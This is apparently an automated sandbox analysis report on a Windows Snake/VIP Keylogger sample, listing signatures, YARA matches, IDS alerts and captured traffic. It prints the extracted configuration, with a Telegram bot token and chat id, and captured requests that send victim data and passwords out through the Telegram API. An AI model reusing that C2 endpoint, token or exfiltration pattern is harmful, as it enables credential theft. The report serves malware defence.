Windows Analysis Report
19d6P55zd1.exe

Overview

General Information

Sample name: 19d6P55zd1.exe (renamed because the original name is a hash value)
Original sample name: 9843d3697d4998e63df6e33939a163e4ebe4f3a8f50f292508992b16680950e5.exe
Analysis ID: 1588019
MD5: 13e4d4a655db53282e89478eb1fdd462
SHA1: 1b72c5e4e03807aa857f095db92a76e36fd2b0cd
SHA256: 9843d3697d4998e63df6e33939a163e4ebe4f3a8f50f292508992b16680950e5
Tags: exe, SnakeKeylogger, user-adrian__luca

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 19d6P55zd1.exe (PID: 4340 cmdline: "C:\Users\user\Desktop\19d6P55zd1.exe" MD5: 13E4D4A655DB53282E89478EB1FDD462)
    • RegSvcs.exe (PID: 1340 cmdline: "C:\Users\user\Desktop\19d6P55zd1.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | (none) | https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE/sendMessage"}
{"Exfil Mode": "Telegram", "Bot Token": "7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE", "Chat id": "2146433139", "Version": "4.4"}
{"Exfil Mode": "Telegram", "Token": "7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE", "Chat_id": "2146433139", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2d53d:$a1: get_encryptedPassword
  • 0x2d84a:$a2: get_encryptedUsername
  • 0x2d35b:$a3: get_timePasswordChanged
  • 0x2d456:$a4: get_passwordField
  • 0x2d553:$a5: set_encryptedPassword
  • 0x2ebec:$a7: get_logins
  • 0x2eb4f:$a10: KeyLoggerEventArgs
  • 0x2e7b4:$a11: KeyLoggerEventArgsEventHandler
Source | Rule | Description | Author | Strings
2.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
2.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
2.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
2.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
2.2.RegSvcs.exe.400000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2d73d:$a1: get_encryptedPassword
  • 0x2da4a:$a2: get_encryptedUsername
  • 0x2d55b:$a3: get_timePasswordChanged
  • 0x2d656:$a4: get_passwordField
  • 0x2d753:$a5: set_encryptedPassword
  • 0x2edec:$a7: get_logins
  • 0x2ed4f:$a10: KeyLoggerEventArgs
  • 0x2e9b4:$a11: KeyLoggerEventArgsEventHandler
                  No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T20:37:44.567549+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49712 | 104.21.112.1 | 443 | TCP
2025-01-10T20:37:45.923744+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49715 | 104.21.112.1 | 443 | TCP
2025-01-10T20:37:43.004704+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49710 | 132.226.247.73 | 80 | TCP
2025-01-10T20:37:43.973459+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49710 | 132.226.247.73 | 80 | TCP
2025-01-10T20:37:45.301557+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49714 | 132.226.247.73 | 80 | TCP
2025-01-10T20:38:01.291299+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49830 | 149.154.167.220 | 443 | TCP
2025-01-10T20:37:54.985464+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49787 | 149.154.167.220 | 443 | TCP

                  AV Detection

Source: 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE", "Chat_id": "2146433139", "Version": "4.4"}
Source: 2.2.RegSvcs.exe.400000.0.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE", "Chat id": "2146433139", "Version": "4.4"}
Source: RegSvcs.exe.1340.2.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE/sendMessage"}
Source: 19d6P55zd1.exe | Virustotal: Detection: 69%
Source: 19d6P55zd1.exe | ReversingLabs: Detection: 76%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 19d6P55zd1.exe | Joe Sandbox ML: detected

                  Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: 19d6P55zd1.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49711 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49787 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP source: 19d6P55zd1.exe, 00000000.00000003.2163750749.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, 19d6P55zd1.exe, 00000000.00000003.2162644338.00000000038F0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 19d6P55zd1.exe, 00000000.00000003.2163750749.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, 19d6P55zd1.exe, 00000000.00000003.2162644338.00000000038F0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0038445A GetFileAttributesW,FindFirstFileW,FindClose | 0_2_0038445A
Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0038C6D1 FindFirstFileW,FindClose | 0_2_0038C6D1
Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0038C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 0_2_0038C75C
Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0038EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_0038EF95
Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0038F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_0038F0F2
Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0038F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_0038F3F3
Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_003837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_003837EF
Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_00383B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00383B12
Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0038BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_0038BCBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0156F8E9h | 2_2_0156F631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0156FD41h | 2_2_0156FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B564E0h | 2_2_05B561E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5F450h | 2_2_05B5F158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B53076h | 2_2_05B52DA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B55066h | 2_2_05B54D98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B510BEh | 2_2_05B50DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B57800h | 2_2_05B57508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5D7A0h | 2_2_05B5D4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5EF88h | 2_2_05B5EC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B52756h | 2_2_05B52488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B58FE8h | 2_2_05B58CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5079Eh | 2_2_05B504D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5A7D0h | 2_2_05B5A4D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5BFB8h | 2_2_05B5BCC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B54747h | 2_2_05B54478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B522C6h | 2_2_05B51FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5BAF0h | 2_2_05B5B7F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5D2D8h | 2_2_05B5CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B542B6h | 2_2_05B53FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5EAC0h | 2_2_05B5E7C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B519B7h | 2_2_05B51710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B569A8h | 2_2_05B566B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B55986h | 2_2_05B556B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B58190h | 2_2_05B57E98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B59978h | 2_2_05B59680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B53996h | 2_2_05B536C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5E130h | 2_2_05B5DE38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5F918h | 2_2_05B5F620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5B160h | 2_2_05B5AE68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5C948h | 2_2_05B5C650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B594B0h | 2_2_05B591B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5AC98h | 2_2_05B5A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5C480h | 2_2_05B5C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B57CC8h | 2_2_05B579D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B52BE6h | 2_2_05B52918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B54BD6h | 2_2_05B54908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5DC68h | 2_2_05B5D970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B50C2Eh | 2_2_05B50960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B58B20h | 2_2_05B58828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5A308h | 2_2_05B5A010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5030Eh | 2_2_05B50040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B57338h | 2_2_05B57040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5B628h | 2_2_05B5B330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5CE10h | 2_2_05B5CB18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5E5F8h | 2_2_05B5E300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B56E70h | 2_2_05B56B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B58658h | 2_2_05B58360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B51E36h | 2_2_05B51B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B53E26h | 2_2_05B53B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B55EB7h | 2_2_05B55B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B59E40h | 2_2_05B59B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5154Eh | 2_2_05B51280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B5FDE0h | 2_2_05B5FAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B53506h | 2_2_05B53238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05B554F6h | 2_2_05B55228

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49830 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49787 -> 149.154.167.220:443
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2011/01/2025%20/%2003:42:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE/sendDocument?chat_id=2146433139&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd32545f3d1fd1Host: api.telegram.orgContent-Length: 584
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                  Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49710 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49714 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49715 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49712 -> 104.21.112.1:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49711 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003922EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_003922EE
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2011/01/2025%20/%2003:42:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
